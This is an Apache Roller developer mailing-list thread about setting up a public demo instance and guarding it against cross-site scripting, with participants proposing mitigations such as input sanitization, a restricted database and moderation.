I will start with ROL-2150, as I can see some security vulnerabilities associated with JavaScript libraries. As a part of this effort, I intend to create a new Security page of Roller but I think should be part of a separate thread. One more thought came to my mind is, we create a separate branch for demo (synced with latest stable) with the restrictions suggested by Nitin. Wdyt?
Thanks and regards, Aditya Sharma On Wed, 21 Aug 2019 at 19:10, Swapnil M Mane <swapnilmm...@apache.org> wrote: > Interesting points raised Dave. > I am inclined with Nitin and Aditya. > I feel demo instance is critical for new adoption since this is always the > entry point for adoptors :-) > > As mentioned by Aditya, In OFBiz, the inputs of text editors are sanitized. > Adding to it, some places of backend screens (requires to log in), no > sanitized done, considering the fact that if the user is logged in, it > means s/he authentic user thus no security vulnerability). [I can > understand this is not applicable for demo instance]. > > In Kibble, there is not much option available for custom inputs, it takes > some defined inputs. > > > Best regards, > Swapnil M Mane, > www.apache.org > > On Tue, Aug 20, 2019 at 11:23 AM Aditya Sharma <iamadityashar...@gmail.com > > > wrote: > > > That makes sense. > > As far as I know OFBiz, input that involve text editors is sanitized. > > Adding to Nitin's inputs. We can use libraries like Jsoup[1] at back end > to > > properly sanitize the user's input and at front end some advance editor > > like summernote that allows escape of script execution[2]. If we can > make > > these changes configurable, so that it won't affect the intrinsic > behavior. > > > > References: > > 1. https://jsoup.org/ > > 2. https://summernote.org/deep-dive/#xss-protection-for-codeview > > > > > > Other references that can add to it: > > https://happycoding.io/tutorials/java-server/sanitizing-user-input > > https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ > > https://github.com/Alex-D/Trumbowyg/issues/160 > > https://www.acunetix.com/websitesecurity/cross-site-scripting/ > > > > Thanks and regards, > > Aditya Sharma > > > > On Tue, 20 Aug 2019 at 01:44, Nitin Lokhande <nitin.lokha...@gmail.com> > > wrote: > > > > > Thoughts I have on this which might need some more effort too. > > > > > > Allowing only alpha numeric in blog post ( For publish ) > > > Not providing publish option and only preview option ( can use wider > > > character set) > > > Creating db manually and limited rights to user connecting to db. > > > Create read only demo by limiting rights of db user. > > > No visibility of new posts and appending keyword to blog handle ( > Delete > > > such blog every 30 min , by some scripts) > > > All new posts triggers emails to moderators prior/after publish ( > include > > > committers from different regions as moderators for demo application ) > > > add captcha for publish as well. > > > > > > Thanks, > > > Nitin > > > > > > On Mon, Aug 19, 2019 at 11:47 AM Dave <snoopd...@gmail.com> wrote: > > > > > > > I'm not totally opposed to the idea but there are some security risks > > to > > > be > > > > considered. > > > > > > > > One of Roller's biggest vulnerabilities is that users are trusted to > > > > publish any type of content and this includes JavaScript which can be > > > used > > > > to make Cross-site scripting and request forgery attacks. You really > > have > > > > to trust your bloggers because the system does not sanitize user > input > > > > (except for blog comments). Even if we delete the data every day bad > > > actors > > > > could use the system to make these sorts of attacks. We could disable > > > > custom themes, but folks could still publish malicious code in blog > > > posts. > > > > > > > > How is that handled for Kibble and OFBiz, do they sanitize all user > > > input? > > > > > > > > Dave > > > > > > > > > > > > On Mon, Aug 19, 2019 at 9:30 AM Aditya Sharma < > adityasha...@apache.org > > > > > > > wrote: > > > > > > > > > Indeed. > > > > > > > > > > +1 > > > > > > > > > > Thanks and Regards, > > > > > Aditya Sharma > > > > > > > > > > On Sat, 17 Aug 2019 at 18:41, Swapnil M Mane < > > swapnilmm...@apache.org> > > > > > wrote: > > > > > > > > > > > Hi team, > > > > > > > > > > > > The new adopters and users are generally looking for a demo > > instance > > > of > > > > > any > > > > > > software to evaluate it. > > > > > > This brings me a thought, we should have a demo instance for the > > > > Roller. > > > > > > > > > > > > Other Apache projects are also set up the demo instance for their > > > > > project, > > > > > > like > > > > > > Apache Kibble - https://demo.kibble.apache.org/ > > > > > > Apache OFBiz - > > > > > https://demo-trunk.ofbiz.apache.org/ecommerce/control/main > > > > > > > > > > > > The demo instance will be redeployed every day with fresh data > and > > > > latest > > > > > > codebase (we may set up instances for old releases, but it is not > > the > > > > > > priority we can do it later). > > > > > > > > > > > > We can request the infra team to set up the demo instance at > > > > > > https://demo.roller.apache.org/ > > > > > > > > > > > > Thought? > > > > > > Please let me know if I missed any existing demo instance. > > > > > > > > > > > > Best regards, > > > > > > Swapnil M Mane, > > > > > > www.apache.org > > > > > > > > > > > > > > > > > > > > >
